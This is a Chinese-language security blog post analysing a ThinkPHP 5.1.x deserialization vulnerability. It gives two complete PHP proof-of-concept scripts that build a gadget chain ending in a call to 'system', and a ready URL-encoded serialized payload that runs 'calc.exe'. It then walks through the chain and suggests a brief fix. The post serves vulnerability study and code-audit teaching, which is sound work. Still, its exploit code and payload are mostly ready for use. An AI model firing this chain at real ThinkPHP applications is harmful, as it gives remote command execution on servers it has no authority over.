

HacKerQWQ的博客空间

TP5.1.X反序列化漏洞分析

HacKerQWQ的博客空间

TP5.1.X反序列化漏洞分析

ThinkPHP 漏洞分析 代码审计

Word count: 1.4kReading time: 6 min

 2021/10/10   Share

• 
• 
• 
• 
• 

漏洞简介

5.1.X版本存在反序列化链子，可以执行任意代码

漏洞演示

使用以下命令下载代码

#下载指定版本的thinkphp源码
composer create-project --prefer-dist topthink/think=v5.1.37 tpdemo

漏洞利用前提

以下两个条件满足一个即可

• 存在反序列化的点如unserialize
• 存在文件上传、文件名完全可控、使用了文件操作函数，例如： file_exists('phar://恶意文件')

poc1

<?php
namespace think\process\pipes{
    use think\Model\Pivot;

    class Windows{
        private $files = [];
        public function __construct()
        {
            $this->files = [new Pivot()];
        }
    }
}

namespace think{
    abstract class Model{
        protected $append = [];
        private $data = [];
        public function __construct()
        {
            $this->append = ['HackerQWQ'=>["test"]];
            $this->data = ['HackerQWQ'=>new Request()];
        }
    }
    class Request{
        protected $config = [
            // 表单请求类型伪装变量
            'var_method'       => '_method',
            // 表单ajax伪装变量
            'var_ajax'         => '_ajax',
            // 表单pjax伪装变量
            'var_pjax'         => '_pjax',
            // PATHINFO变量名 用于兼容模式
            'var_pathinfo'     => 's',
            // 兼容PATH_INFO获取
            'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
            // 默认全局过滤方法 用逗号分隔多个
            'default_filter'   => '',
            // 域名根，如thinkphp.cn
            'url_domain_root'  => '',
            // HTTPS代理标识
            'https_agent_name' => '',
            // IP代理获取标识
            'http_agent_ip'    => 'HTTP_X_REAL_IP',
            // URL伪静态后缀
            'url_html_suffix'  => 'html',
        ];
//        命令
        protected $param = ['cmd'=>'whoami'];
        protected $mergeParam = true;
        protected $hook = [];
        protected $filter;

        public function __construct(){
            $this->hook = ['visible'=>[$this,'isAjax']];
            $this->mergeParam = true;
            $this->filter = "system";
//            对应param的键
            $this->config['var_ajax'] = 'cmd';
        }
    }
}


namespace think\model{
    use think\Model;
    class Pivot extends Model{

    }
}

namespace {

    use think\process\pipes\Windows;
    $exp = new Windows();
    echo urlencode(serialize($exp));
}

poc2

<?php

namespace think;
use think\facade\Cookie;
use think\facade\Session;

class Request
{
    protected $hook = [];
    protected $config = [];
    protected $filter;
    protected $param = [];

    public function __construct(){
        $this->filter = 'system';
        $this->param = ['calc.exe'];
        $this->hook = ['visible'=>[$this,'isAjax']];
        $this->config = ['var_ajax' => ''];
    }
}

abstract class Model{
    protected $append = [];
    private $data = [];

    function __construct()
    {
        $this->append = ['Th0r' => ['a']];
        $this->data = ['Th0r' => new Request()];
    }
}

namespace think\model;
use think\Model;
use think\Request;

class Pivot extends Model
{

}

namespace think\process\pipes;
use think\model\Pivot;

class Pipes{}

class Windows extends Pipes
{
    private $files = [];

    function __construct(){
        $this->files = [new Pivot()];
    }
}

echo base64_encode(serialize(new Windows()));

生成弹计算器的payload，通过post传参

c=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A9%3A%22HackerQWQ%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A4%3A%22test%22%3B%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A9%3A%22HackerQWQ%22%3BO%3A13%3A%22think%5CRequest%22%3A5%3A%7Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A10%3A%7Bs%3A10%3A%22var_method%22%3Bs%3A7%3A%22_method%22%3Bs%3A8%3A%22var_ajax%22%3Bs%3A3%3A%22cmd%22%3Bs%3A8%3A%22var_pjax%22%3Bs%3A5%3A%22_pjax%22%3Bs%3A12%3A%22var_pathinfo%22%3Bs%3A1%3A%22s%22%3Bs%3A14%3A%22pathinfo_fetch%22%3Ba%3A3%3A%7Bi%3A0%3Bs%3A14%3A%22ORIG_PATH_INFO%22%3Bi%3A1%3Bs%3A18%3A%22REDIRECT_PATH_INFO%22%3Bi%3A2%3Bs%3A12%3A%22REDIRECT_URL%22%3B%7Ds%3A14%3A%22default_filter%22%3Bs%3A0%3A%22%22%3Bs%3A15%3A%22url_domain_root%22%3Bs%3A0%3A%22%22%3Bs%3A16%3A%22https_agent_name%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22http_agent_ip%22%3Bs%3A14%3A%22HTTP_X_REAL_IP%22%3Bs%3A15%3A%22url_html_suffix%22%3Bs%3A4%3A%22html%22%3B%7Ds%3A8%3A%22%00%2A%00param%22%3Ba%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A8%3A%22calc.exe%22%3B%7Ds%3A13%3A%22%00%2A%00mergeParam%22%3Bb%3A1%3Bs%3A7%3A%22%00%2A%00hook%22%3Ba%3A1%3A%7Bs%3A7%3A%22visible%22%3Ba%3A2%3A%7Bi%3A0%3Br%3A8%3Bi%3A1%3Bs%3A6%3A%22isAjax%22%3B%7D%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D%7D

漏洞分析

在Index.php添加以下代码

<?php
namespace app\index\controller;

class Index
{
    public function index()
    {
        $u = unserialize($_POST['c']);
        return 'hhh';
    }

    public function hello($name = 'ThinkPHP5')
    {
        return 'hello,' . $name;
    }
}

前几个点都跟TP5.0.X的差不多

由Windows.php的removeFiles到file_exists触发Conversion.php的__toString到toJson然后是toArray

toArray函数中需要关注的是$relation->visible函数，因为这可以触发__call从而继续利用，先看下一部分的链子

找到Request类的__call方法，这里的$this->hood[$method]变量可控，但是上面的array_unshift函数会把$this放到$args数组中的第一个从而触发fatal error退出程序，因此还需要寻找其他可利用的方法

这里通过call_user_func_array([类名,方法名],变量)的形式调用任意类的任意方法，而之前分析TP5任意代码执行的漏洞的时候出镜率比较高的input方法就派上用场了

但是由于存在一个强制转换，类对象被强制转换的话会触发fatal error，因此需要用其他方法进入input方法，这里我们用Reuqest的param方法，需要让$this->param为我们的命令(calc.exe),从而进入input方法，但是这样的话还是第二个参数位置的$name变量强制转换，因此还需要往上套

这里找到isAjax或者isPjax都可以，这里的$this->config['var_ajax']可控，这样就不会引起name强制转换出错了

顺利进入到intput方法后，getFilter方法返回$this->filter,照例改为system，然后这里进入is_array分支或者不进入都可以，在上面的$this->param处修改即可，然后调用fileterValue

此时$filter为system,$data为payload，通过call_user_func执行任意代码

漏洞修复

在Windows.php处对$filename进行校验就好了

Author：HacKerQWQ

原文链接：https://hackerqwq.github.io/2021/10/10/TP5-1-X%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

发表日期：October 10th 2021, 11:08:19 pm

更新日期：October 10th 2021, 11:43:10 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  TP6任意文件写漏洞分析
• Previous Post
  Android权限模型

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 漏洞简介
2. 2. 漏洞演示
   1. 2.1. 漏洞利用前提
3. 3. 漏洞分析
4. 4. 漏洞修复



• Archive
• Tag
• Cate

Total : 163



2023

• 02/23Despercate Cat 带来的Tomcat利用思路

2022

• 10/02利用链神器-tabby使用
• 10/01neo4j图形数据库笔记
• 09/24PHP反序列化利用面总结
• 09/22Webshell免杀之php(WebShell免杀篇一)
• 09/21source map源码泄露利用
• 09/01中间件利用面
• 08/31java基础之jndi
• 08/24java基础之RMI
• 08/23Shiro漏洞分析及利用
• 08/20Jboss利用面整理
• 08/18富文本编辑器漏洞整理
• 07/27内网渗透之横向移动
• 07/18javaweb代码审计学习(OGNL表达式注入)
• 06/18(p神)环境变量命令执行及nginx机制的LFI利用
• 05/05Web安全之机器学习算法
• 01/24Docker逃逸几种方法
• 01/13渗透测试之反弹shell合集
• 01/12内网渗透之Linux及Windows隐藏篇
• 01/10权限维持之alisa后门
• 01/10权限维持之LD_PRELOAD动态链接库后门

2021

• 12/29badusb制作上线cs
• 12/17javaweb代码审计(整数溢出,硬编码密码，不安全的随机数生成器)
• 12/14javaweb代码审计学习(SSTI漏洞)
• 12/13javaweb代码审计(反序列化漏洞)
• 12/12javaweb代码审计学习(SpEL注入)
• 12/11log4j远程代码执行漏洞分析
• 12/05javaweb代码审计(XXE漏洞)
• 12/05javaweb代码审计学习(命令执行)
• 11/30javaweb代码审计学习(目录穿越&URL跳转)
• 11/29javaweb代码审计学习(文件上传漏洞)
• 11/17机器学习入门:神经网络和机器学习简介
• 11/15极致cms v1.9.5文件上传漏洞
• 11/10javaweb代码审计学习(SSRF)
• 11/09open_basedir方法总结
• 11/06javaweb代码审计学习(xss)
• 11/05php几道随机数题小总结
• 11/05强网杯拟态easy filter解析
• 11/05vscode远程调试php底层代码
• 11/02文件包含漏洞小总结
• 11/01javaweb代码审计学习(sql注入)
• 10/26无参数rce新解法(2021慕测web应用个人赛norce)
• 10/23Android安全之环境搭建及基础知识
• 10/19TP6.0.X反序列化链漏洞分析
• 10/18TP6任意文件写漏洞分析
• 10/10TP5.1.X反序列化漏洞分析
• 10/08Android权限模型
• 10/07TP5.0.X反序列化漏洞分析
• 09/26TP5文件包含漏洞分析(5.0.0-5.0.18,5.1.0-5.1.10)
• 09/21内网渗透之非约束委派攻击&约束委派攻击
• 09/17渗透测试之提权篇三(Windows提权)
• 09/15laravel RCE漏洞(CVE-2021-3129)利用
• 09/06渗透测试之提权篇二(Linux提权)
• 09/05python内置模块的导入及覆盖知识
• 09/02TP5RCE代码执行漏洞分析(5.0.0<=ThinkPHP5<=5.0.23,5.1.0<=ThinkPHP<=5.1.30
• 08/31php反射利用总结
• 08/31php内置类的利用
• 08/29PHP反序列化小技巧之Fast Destruct
• 08/09Java代理学习
• 08/03pickle序列化与反序列化
• 07/28Java IO/NIO读写文件
• 07/26Java类加载机制和反射机制
• 07/24TP5RCE代码执行漏洞分析(5.0.7-5.0.22,5.1.0-5.1.30)
• 07/24TP5写WebShell(5.0.0-5.0.10)
• 07/11内网渗透之端口转发、映射、代理
• 07/09内网渗透之LDAP协议学习
• 07/01内网渗透之LM、NTLM认证学习及攻击
• 06/30TP5SQL注入漏洞分析(5.0.10)
• 06/28内网渗透之kerberos协议学习及攻击方法总结
• 06/27XMLDecoder反序列化漏洞
• 06/26TP5SQL注入漏洞分析TP5全版本
• 06/25TP5SQL注入漏洞分析(5.1.6-5.1.7)
• 06/25TP5SQL注入漏洞分析(5.0.13-5.0.15,5.1.0-5.1.5)
• 06/18未授权访问漏洞归纳
• 06/18arp欺骗与攻击
• 06/18udf提权学习
• 05/162021CISCNweb总结
• 04/24弱类型比较小笔记
• 04/23代码执行小总结
• 04/20nodejs利用小总结
• 04/19redis攻防利用面总结
• 04/17文件读取漏洞常见读取路径(NU1L的书)
• 04/13文件上传反序列化getshell-[强网杯 2019]Upload
• 04/09读取变量getflag-[BJDCTF2020]EzPHP
• 04/08sql绕过过滤速查
• 04/072021红明谷misc部分复现
• 04/04proc目录在ctf中的应用
• 04/01内网渗透-信息收集篇
• 03/26Nep2021个人赛总结&wp(学习笔记)
• 02/28sql注入速查笔记
• 02/27XSS的payload和绕过总结
• 02/23python库Pillow的常见用法

2020

• 12/22preg_match绕过方法总结
• 12/21$_GET中的下划线绕过(小笔记)
• 12/19无字母数字构造shell小总结
• 12/12利用phar拓展反序列化攻击面例题
• 12/08pickle远程代码执行+jwt+逻辑漏洞[CISCN2019 华北赛区 Day1 Web2]ikun
• 11/17unicode等价替换
• 11/16浅析SSRF漏洞
• 11/14balckhat议题的应用(python+nignx=pythonignx)
• 11/10THINKPHP-poc-collection
• 11/09redis的基本操作笔记
• 11/09开源Web应用扫描软件使用笔记
• 11/08无参数构造payload读取文件(含PHP数组的知识)
• 11/06sql之python脚本注入
• 10/30escapeshellarg/escapeshellcmd造成参数注入
• 10/29SQL注入之HANDLER查表
• 10/29WEB-INF目录下信息泄露
• 10/29python多线程审计代码可利用变量
• 10/26Caculator题的exp
• 10/23渗透测试之提权篇一(Linux及Windows提权相关概念)
• 10/20刷题记录：[SUCTF 2019]EasySQL
• 10/20N1CTF_websignin(sql注入&逻辑)
• 10/18.htaccess上传结合lua脚本执行命令
• 10/14变量覆盖漏洞
• 10/13SQL语句之增删改查及用户权限
• 10/13零宽度字符隐写
• 10/12.htaccess的漏洞利用总结
• 10/10Private-Key Encryption(1)
• 10/10Perfectly Secret Encryption
• 10/10Hash函数的相关知识
• 10/10CRC冗余码相关知识
• 09/26CRC32碰撞恢复png(含png块的知识)
• 09/10攻防世界-Reverse-it(xxd、tr、rev命令)
• 09/06破解zip密码命令
• 08/26攻防世界-stegnao-二维码原理及rar伪加密
• 08/212020全国大学生信息安全大赛-初赛部分writeup
• 08/19宽字节注入+curl读取文件+Django框架漏洞的组合拳
• 08/19SSTI模板注入
• 08/19__wakeup()的绕过和正则绕过
• 08/19二次注入在实战的运用
• 08/18php反序列化漏洞及upload_progress_sessions
• 08/16Hash长度拓展攻击
• 08/15内网渗透之Linux及Windows后门篇
• 08/15[转载]CSP总结及CTF实例分析
• 08/14堆叠注入、预定义sql语句的知识及例题
• 08/14md5碰撞脚本及shtml在BDJCTF的例题
• 08/14jwt在网鼎杯的运用
• 08/13phpmyAdmin文件包含漏洞在2018-HCTF的例题
• 08/132020-网鼎杯-青龙组-Web
• 08/12动态调用函数以及nmap用法在网鼎杯的例题
• 08/12取反异或绕过
• 08/11[转载]sql注入绕过大集合
• 08/08JWT的利用
• 08/07命令执行小总结
• 08/06SVN和HG源码泄露
• 08/06.git源码泄露
• 08/05VIM编辑器异常退出导致的源码泄露
• 08/05Jarvis injeect(反引号注入)
• 08/05XXE注入
• 07/29搭建wordpress环境(docker)测试plugin漏洞
• 07/23metasploit之信息收集学习
• 07/22[转载]渗透基础-常用Windows命令大全
• 07/19信息收集工具/网站整理
• 07/13metasploit魔鬼训练营之初识metasploit
• 07/01PHP代码审计学习(一)PHP配置分析
• 06/11文件上传漏洞知识点整理
• 06/10MD5-collision
• 04/27PHP伪协议小总结
• 04/24http各头部字段的含义（转载）
• 04/16利用ms17-010漏洞进行攻击
• 04/12MySQL的基础操作（1）
• 04/06First Blog

ctf PHP反序列化 sql jwt 2021CISCN 文件上传 uncide欺骗 无列名注入 php反射类利用 2021红明谷 输入法取证 盲水印隐写 哈夫曼编码 流量分析 Android md5 shtml 2020CISCN png结构 CRC32 Crypto Java安全 intro 权限提升 Docker CVE Hash php_upload_progress_session hash长度拓展攻击 红蓝对抗 MySQL PHP代码审计 PHP 2021Nep 命令执行 PHP原生类 云函数 JAVA_WEB ThinkPHP 原型链污染 nodejs 源码泄露 SSTI 漏洞分析 渗透测试 代码审计 JAJA XML 漏洞 免杀 机器学习 XSS XXE 硬件安全 社工 编码漏洞 nginx常见文件位置 .htaccess利用 HTTP协议 内网渗透 横向移动 漏洞利用 metasploit 信息收集 CTF PHP伪协议 php pickle 逻辑漏洞 2019CISCN python 多线程 misc图像处理 Nginx LFI redis攻防 提权 C 代码执行 渗透 权限维持 bugs phar反序列化 变量覆盖漏洞 扫描软件 弱类型比较 Django rar伪加密 二维码 文件上传漏洞 文件包含 文件读取漏洞 无参数构造payload 神经网络 红队 SSRF url取反绕过 misc_zip create_function注入 零宽度字符



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true



